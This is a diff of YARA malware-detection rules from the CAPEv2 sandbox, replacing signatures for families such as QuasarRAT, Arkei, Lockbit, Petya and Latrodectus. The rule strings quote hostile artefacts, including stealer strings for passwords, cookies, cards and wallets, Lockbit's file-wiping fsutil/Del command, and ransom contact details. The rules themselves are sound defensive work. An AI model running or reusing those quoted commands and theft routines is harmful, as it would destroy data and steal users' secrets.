+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "f735549606917f59a19157e604e54766e4456bc5d46e94cae3e0a3c18b52a7ca"
 		score = 75
-		quality = 62
-		tags = ""
-		cape_type = "DCRat Payload"
+		quality = 70
+		tags = "FILE"
+		cape_type = "Sedreco Payload"
 
 	strings:
-		$venom_1 = "VenomRAT" wide ascii nocase
-		$venom_2 = "HVNC_REPLY_MESSAGE" wide ascii
-		$str_aes_exc = "masterKey can not be null or empty" wide ascii
-		$str_b64_amsi = "YW1zaS5kbGw=" wide ascii
-		$str_b64_virtual_protect = "VmlydHVhbFByb3RlY3Q=" wide ascii
-		$str_dcrat = "dcrat" wide ascii nocase
-		$str_plugin = "save_Plugin" wide ascii
-		$str_qwqdan = "qwqdan" wide ascii
-		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
-		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
+		$encrypt1 = {55 8B EC 83 EC 2C 53 56 8B F2 57 8B 7D 08 B8 AB AA AA AA}
+		$encrypt2 = {55 8B EC 83 EC 20 8B 4D 10 B8 AB AA AA AA}
+		$encrypt64_1 = {48 89 4C 24 08 53 55 56 57 41 54 41 56 48 83 EC 18 45 8D 34 10 48 8B E9 B8 AB AA AA AA 4D 8B E1 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA}
 
 	condition:
-		( not any of ( $venom* ) ) and 5 of them and #patt_config >= 10
+		uint16( 0 ) == 0x5A4D and $encrypt1 or $encrypt2 or $encrypt64_1
 }
-rule CAPE_Quasarrat : FILE
+rule CAPE_Kronos : FILE
 {
 	meta:
-		description = "QuasarRAT payload"
-		author = "ditekshen"
-		id = "f256b88f-eee6-5f8c-afd6-32ed10ea908d"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "Kronos Payload"
+		author = "kevoreilly"
+		id = "921a939b-a037-5973-bd8e-f9f55fce7f0f"
+		date = "2019-10-30"
+		modified = "2020-07-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L245-L266"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "556b19dc0980761198ea31a285f281adae084463d24bff1eda15326436ad562b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Kronos.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "52ce9caf3627efe8ae86df6ca59e51e9f738e13ac0265f797e8d70123dbcaeb3"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "QuasarRAT Payload"
+		cape_type = "Kronos Payload"
 
 	strings:
-		$s1 = "GetKeyloggerLogsResponse" fullword ascii
-		$s2 = "GetKeyloggerLogs" fullword ascii
-		$s3 = "/>Log created on" wide
-		$s4 = "User: {0}{3}Pass: {1}{3}Host: {2}" wide
-		$s5 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide
-		$s6 = "grabber_" wide
-		$s7 = "<virtualKeyCode>" ascii
-		$s8 = "<RunHidden>k__BackingField" fullword ascii
-		$s9 = "<keyboardHookStruct>" ascii
-		$s10 = "add_OnHotKeysDown" ascii
-		$mutex = "QSR_MUTEX_" ascii wide
-		$ua1 = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0" fullword wide
-		$us2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" fullword wide
+		$a1 = "user_pref(\"network.cookie.cookieBehavior\""
+		$a2 = "T0E0H4U0X3A3D4D8"
+		$a3 = "wow64cpu.dll" wide
+		$a4 = "Kronos" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $mutex or ( all of ( $ua* ) and 2 of them ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and ( 2 of ( $a* ) )
 }
-rule CAPE_Quasarrat_Kingrat
+rule CAPE_Jaff : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "dc0139e1-9f69-51da-b28f-212358b2f68b"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "Jaff Payload"
+		author = "kevoreilly"
+		id = "6681c1fe-6c88-5a49-bdfa-54ce08ea6707"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L268-L287"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "1f4296a592134edbe52e256dc353143af02e897ff1afad98f3dac0c5ab13f3f7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Jaff.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6806a5eeee04b7436ff694addc334bfc0f1ee611116904d57be9506acfd47418"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "Jaff Payload"
+
+	strings:
+		$a1 = "CryptGenKey"
+		$a2 = "353260540318613681395633061841341670181307185694827316660016508"
+		$b1 = "jaff"
+		$b2 = "2~1c0q4t7"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 1 of ( $b* ) )
+}
+rule CAPE_Latrodectus_1
+{
+	meta:
+		description = "Latrodectus Payload"
+		author = "enzok"
+		id = "956b6736-b3ef-5974-b3dd-02d04336dbe8"
+		date = "2024-01-18"
+		modified = "2025-05-10"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Latrodectus.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "a547cff9991a713535e5c128a0711ca68acf9298cc2220c4ea0685d580f36811"
+		logic_hash = "a8430299930f4c8de0a88c6836d4821871f7183cc5ff44ea9be84fbea47bbb13"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "QuasarRAT Payload"
+		cape_type = "Latrodectus Payload"
 
 	strings:
-		$str_quasar = "Quasar." wide ascii
-		$str_hidden = "set_Hidden" wide ascii
-		$str_shell = "DoShellExecuteResponse" wide ascii
-		$str_close = "echo DONT CLOSE THIS WINDOW!" wide ascii
-		$str_pause = "ping -n 10 localhost > nul" wide ascii
-		$str_aes_exc = "masterKey can not be null or empty" wide ascii
-		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 25 }
-		$byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
-		$byte_special_folder = { 7e 73 [4] 28 [4] 80 }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
-		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
+		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
+		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
+		$procchk1 = {E8 [3] FF 85 C0 74 [2] FF FF FF FF E9 [4] E8 [4] 89 44 24 ?? E8 [4] 83 F8 4B 73 ?? 83 [3] 06}
+		$procchk2 = {72 [2] FF FF FF FF E9 [4] E8 [4] 83 F8 32 73 ?? 83 [3] 06}
+		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
 
 	condition:
-		6 of them and #patt_config >= 10
+		all of them
 }
-rule CAPE_Buerloader_1 : FILE
+rule CAPE_Latrodectus_AES
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly & Rony (@r0ny_123)"
-		id = "95a9b4d7-db1e-50cd-bc08-01e4e4fd6dc4"
-		date = "2020-10-29"
-		modified = "2022-05-31"
+		description = "Latrodectus Payload"
+		author = "enzok"
+		id = "16c295f5-cea0-57b5-b826-e1126e50c8cc"
+		date = "2024-01-18"
+		modified = "2025-05-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/BuerLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "05c1f008f0a2bb8232867977fb23a5ae8312f10f0637c6265561052596319c29"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Latrodectus.yar#L18-L34"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "5cecb26a3f33c24b92a0c8f6f5175da0664b21d7c4216a41694e4a4cad233ca8"
+		logic_hash = "058d278c16527969066d1b4ea7f0e3ab2809d5480cdab06ec476b465e0c4795a"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "BuerLoader Payload"
+		tags = ""
+		cape_type = "Latrodectus Payload"
 
 	strings:
-		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
-		$decode = {8A 0E 84 C9 74 0E 8B D0 2A 0F 46 88 0A 42 8A 0E 84 C9 75 F4 5F 5E 5D C2 04 00}
-		$op = {33 C0 85 D2 7E 1? 3B C7 7D [0-15] 40 3B C2 7C ?? EB 02}
+		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
+		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
+		$key = {C6 44 2? ?? ?? [150] C6 44 2? ?? ?? B8 02}
+		$aes_ctr_1 = {8B 44 24 ?? FF C8 89 44 24 ?? 83 7C 24 ?? 00 7C ?? 4? 63 44 24 ?? 4? 8B 4C 24 ?? 0F B6 84 01 F0 00 00 00 3D FF 00 00 00}
+		$aes_ctr_2 = {48 03 C8 48 8B C1 0F B6 ?? 48 63 4C 24 ?? 0F B6 4C 0C ?? 33 C1 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 03 D1 48 8B CA 88 01}
+		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		all of them
 }
-rule CAPE_Scarab : FILE
+rule CAPE_Blister_1 : FILE
 {
 	meta:
-		description = "Scarab Payload"
+		description = "Blister Loader"
 		author = "kevoreilly"
-		id = "2ba8ae50-1e56-5773-aaea-058161b59c78"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "525fc600-2afc-5cf6-bf55-4ce0ea264dca"
+		date = "2022-05-10"
+		modified = "2023-09-20"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Scarab.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "0d8fa7ab4c8e5699f17f9e9444e85a42563a840a8e7ee9eda54add3a6845d1c6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Blister.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
+		hash = "d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802c"
+		logic_hash = "f26d85fdf0eb07e67fe38c43c5f6d024bfb7b2a333cb3411f5cdcff6bf5db12d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Scarab Payload"
+		cape_type = "Blister Loader"
 
 	strings:
-		$crypt1 = {8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08}
-		$crypt2 = {8B 4C 82 0C 8B D9 C1 E3 18 C1 E9 08 0B D9 8B CB 0F B6 D9 8B 1C 9D AC 0C 43 00 89 5C 24 04 8B D9 C1 EB 08 0F B6 DB 8B 34 9D AC 0C 43 00 8B D9 C1 EB 10}
-		$crypt3 = {8B 13 8B CA 81 E1 80 80 80 80 8B C1 C1 E8 07 50 8B C1 59 2B C1 25 1B 1B 1B 1B 8B CA 81 E1 7F 7F 7F 7F 03 C9 33 C1 8B C8 81 E1 80 80 80 80 8B F1 C1 EE 07}
+		$protect1 = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
+		$protect2 = {48 83 C9 FF 48 8D 55 ?? FF D6 48 8D 87 [2] 00 00 48 8D 4D ?? FF D0}
+		$lock1 = {B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75}
+		$lock2 = {B8 FF FF FF 7F 41 BC 01 00 00 00 89 45 40 F0 FF 4D 40 49 2B C4 75}
+		$decode = {0F BE C0 49 03 CC 41 33 C1 44 69 C8 [4] 41 8B C1 C1 E8 0F 44 33 C8 8A 01 84 C0 75 E1 41 81 F9 [4] 74}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Arkei : FILE
+rule CAPE_Lockbit : FILE
 {
 	meta:
-		description = "Arkei Payload"
-		author = "kevoreilly, YungBinary"
-		id = "18363a5b-46f3-5d11-9bc6-a91f81b49706"
-		date = "2019-10-30"
-		modified = "2025-01-10"
+		description = "Lockbit Payload"
+		author = "kevoreilly"
+		id = "ec9b4fec-0233-5277-b922-07057c2b4b34"
+		date = "2020-05-14"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Arkei.yar#L1-L50"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "296e420880d8d2f24424d0411e7ef4939e18147689557512f410da48498a44c9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Lockbit.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "80ab705c8246a0bd5b3de65146cf32b102f39bf9444bdf1d366b5a794c1229b9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Arkei Payload"
+		cape_type = "Lockbit Payload"
 
 	strings:
-		$string1 = "Windows_Antimalware_Host_System_Worker"
-		$string2 = "Arkei"
-		$string3 = "Bitcoin\\wallet.dat"
-		$string4 = "Ethereum\\keystore"
-		$v1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
-		$v2 = "/c taskkill /im " fullword ascii
-		$v3 = "card_number_encrypted FROM credit_cards" ascii
-		$v4 = "\\wallet.dat" ascii
-		$v5 = "Arkei/" wide
-		$v6 = "files\\passwords." ascii wide
-		$v7 = "files\\cc_" ascii wide
-		$v8 = "files\\autofill_" ascii wide
-		$v9 = "files\\cookies_" ascii wide
-		$loaded_modules = {
-            64 A1 30 00 00 00
-            8B 40 0C
-            8B 40 0C
-            8B 00
-            8B 00
-            8B 40 18
-            89 45 FC
-            8B 45 FC
-            8B E5
-            5D
-            C3
-        }
-		$language_check = {
-            FF 15 ?? ?? ?? ??
-            0F B7 C0
-            89 45 ??
-            81 7D ?? 3F 04 ?? ??
-            7F
-        }
-		$ext1 = ".zoo" ascii
-		$ext2 = ".arc" ascii
+		$string1 = "/C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" wide
+		$string2 = "Ransom" ascii wide
+		$crypto = {8B 4D 08 C1 E9 10 0F B6 D1 8B 4D 0C C1 E9 08 0F B6 C9 8B 14 95 [4] 8B 7D FC 33 14 8D [4] 8B CF C1 E9 18 33 14 8D [4] 0F B6 CB 33 14 8D [4] 8B CF 33 10}
+		$decode1 = {8A ?4 34 ?C 0? 00 00 8B 8? 24 ?8 0? 00 00 0F BE ?? 0F BE C? 33 ?? 88 ?? 34 ?? 0? 00 00 46 83 FE 0? 72 DD}
+		$decode2 = {8A 44 24 ?? 30 44 0C ?? 41 83 F9 ?? 72 F2}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $loaded_modules and $language_check and $ext1 and $ext2 ) or ( all of ( $string* ) or 7 of ( $v* ) ) )
+		uint16( 0 ) == 0x5A4D and ( 2 of them )
 }
-rule CAPE_Cerber : FILE
+rule CAPE_Bazar : FILE
 {
 	meta:
-		description = "Cerber Payload"
+		description = "No description has been set in the source file - CAPE"
 		author = "kevoreilly"
-		id = "edf08795-cf54-5822-8bc4-35cfba0fe8e8"
-		date = "2019-10-30"
+		id = "e042f180-2a82-5c93-9858-77281557dd10"
+		date = "2021-08-26"
 		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Cerber.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "16a8f808c28d3b142c079a305aba7f553f2452e439710bf610a06f8f2924d5a3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Bazar.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "9375f59b56e47fd0b90b089afdf3be8f16f960038fc625523a2e2d5509ab099d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Cerber Payload"
+		cape_type = "Bazar Payload"
 
 	strings:
-		$code1 = {33 C0 66 89 45 8? 8D 7D 8? AB AB AB AB AB [0-2] 66 AB 8D 45 8? [0-3] E8 ?? ?? 00 00}
+		$decode = {F7 E9 [0-2] C1 FA 0? 8B C2 C1 E8 1F 03 D0 6B C2 ?? 2B C8}
+		$rsa = {C7 00 52 53 41 33 48 8D 48 09 C7 40 04 00 08 00 00 4C 8D 05 [3] 00 C6 40 08 03 B8 09 00 00 00 [0-3] 48 8D 89 80 00 00 00 41 0F 10 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Squirrelwaffle : FILE
+rule CAPE_Petya : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly & R3MRUM"
-		id = "0ae75f24-7a2a-57d3-8c6f-a61ac6cc08e7"
-		date = "2021-09-22"
-		modified = "2021-10-13"
+		description = "Petya Payload"
+		author = "kevoreilly"
+		id = "e581747c-c40f-5689-84b4-d55134b532f7"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/SquirrelWaffle.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5f799333398421d537ec7a87ca94f6cc9cf1e53e55b353036a5132440990e500"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Petya.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "f819261bb34f3b2eb7dc2f843b56be25105570fe902a77940a632a54fbe0d014"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "SquirrelWaffle Payload"
+		cape_type = "Petya Payload"
 
 	strings:
-		$code = {8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39 8D 4D ?? 0F B6 C0 50 6A 01 E8 [4] C6 45}
-		$decode = {F7 75 ?? 83 7D ?? 10 8D 4D ?? 8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39}
+		$a1 = "CHKDSK is repairing sector"
+		$a2 = "wowsmith123456@posteo.net"
+		$a3 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Seduploader : FILE
+rule CAPE_Azer : FILE
 {
 	meta:
-		description = "Seduploader decrypt function"
+		description = "Azer Payload"
 		author = "kevoreilly"
-		id = "a7152d8c-a197-5784-8a6d-453d41585df1"
+		id = "4bda70c2-3cd9-543f-92f4-886b7dd899a1"
 		date = "2019-10-30"
-		modified = "2022-06-09"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Seduploader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "d70c886699169d4dafc5b063c93682a34af5667df6d293b52256ddc19ab9c516"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Azer.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "48bd4a4e071f10d1911c4173a0cd39c69fed7a3b29eb92beffe709899f4cefa5"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Seduploader Payload"
+		cape_type = "Azer Payload"
 
 	strings:
-		$decrypt1 = {8D 0C 30 C7 45 FC 0A 00 00 00 33 D2 F7 75 FC 8A 82 ?? ?? ?? ?? 32 04 0F 88 01 8B 45 0C 40 89 45 0C 3B C3 7C DB}
+		$a1 = "webmafia@asia.com" wide
+		$a2 = "INTERESTING_INFORMACION_FOR_DECRYPT.TXT" wide
+		$a3 = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $decrypt* )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
 rule CAPE_Dridexv4 : FILE
 {
@@ -64456,8 +64070,8 @@ rule CAPE_Dridexv4 : FILE
 		date = "2019-10-30"
 		modified = "2022-05-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/DridexV4.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/DridexV4.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "cb103fe5f2d4792e3c612db4e2d84a4c8b0ce0f9a8443e9147e2c345f1dbdff6"
 		score = 75
 		quality = 70
@@ -64474,1026 +64088,1252 @@ rule CAPE_Dridexv4 : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Smokeloader
+rule CAPE_Dreambot : FILE
 {
 	meta:
-		description = "SmokeLoader Payload"
+		description = "Dreambot Payload"
 		author = "kevoreilly"
-		id = "33c11a73-30d5-507b-af12-14708fa96640"
+		id = "675c2fea-fe48-5afd-9fa1-de919134892f"
 		date = "2019-10-30"
-		modified = "2025-11-19"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/SmokeLoader.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "8e2f95af9b25ccfd8ad7b56f75a37bb085bde1b2feda2e6502568e86c928ed68"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Dreambot.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "29c6d648d5d38667c5824c2d20a83a20448c2ae6054ddddb2b2b7f8bdb69f74b"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "SmokeLoader Payload"
+		tags = "FILE"
+		cape_type = "Dreambot Payload"
 
 	strings:
-		$rc4_decrypt64_1 = {41 8D 41 01 44 0F B6 C8 42 0F B6 [2] 41 8D 04 12 44 0F B6 D0 42 8A [2] 42 88 [2] 42 88 [2] 42 0F B6 [2] 03 CA 0F B6 C1 8A [2] 30 0F 48 FF C7 49 FF CB 75}
-		$rc4_decrypt64_2 = {03 C8 8B C1 89 44 [2] 0F B6 8C [2] 01 00 00 33 D2 8B 04 24 F7 F1 8B C2 8B C0 48 8B 8C [2] 01 00 00 0F B6 04 01 8B 4C [2] 03 C8 8B C1 25 FF 00 00 00}
-		$rc4_decrypt64_3 = {8B 04 ?? FF C0 25 FF 00 00 00 89 04 ?? 8B 04 ?? 0F B6 44 [2] 8B 4C [2] 03 C8 8B C1 25 FF 00 00 00}
-		$rc4_decrypt32 = {47 B9 FF 00 00 00 23 F9 8A 54 [2] 0F B6 C2 03 F0 23 F1 8A 44 [2] 88 44 [2] 88 54 [2] 0F B6 4C [2] 0F B6 C2 03 C8 81 E1 FF 00 00 00 8A 44 [2] 30 04 2B 43 3B 9C 24 [4] 72 C0}
-		$fetch_c2_64 = {74 ?? B? E8 03 00 00 B9 58 02 00 00 FF [5] 48 (FF C?|83 EF 01) 75 (F0|EF)}
-		$fetch_c2_32 = {8B 96 [2] (00|01) 00 8B CE 5E 8B 14 95 [4] E9}
+		$a1 = {53 56 33 F6 33 DB C1 6C 24 0C 02 74 2F 8B 02 85 C0 75 11 83 7C 24 0C 02 76 0A 39 42 04 75 05 39 42 08 74 18 43 8A CB D3 C0 33 C6 33 44 24 10 8B F0 89 32 83 C2 04 FF 4C 24 0C 75 D1 5E 5B C2 08 00}
+		$a2 = {53 33 C9 33 DB C1 6C 24 08 02 74 22 56 8B 02 85 C0 8B F0 74 18 33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 E0 5E 5B C2 08 00}
+		$b1 = "Oct  5 2016"
+		$b2 = ".bss"
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $a* ) ) and ( all of ( $b* ) )
 }
-rule CAPE_Rozena
+rule CAPE_Tscookie : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "Kevin O'Reilly"
-		id = "38ca9da3-2a0e-500f-8eb8-9de69a7f2da5"
-		date = "2024-03-13"
-		modified = "2024-03-15"
+		description = "TSCookie Payload"
+		author = "kevoreilly"
+		id = "e1efd356-7170-5454-bf40-68927c71816c"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Rozena.yar#L1-L10"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "c415a8108b58a125a604031bb8d73b58a8aae5429b5b765e35fa8a4add9cd135"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/TSCookie.yar#L1-L13"
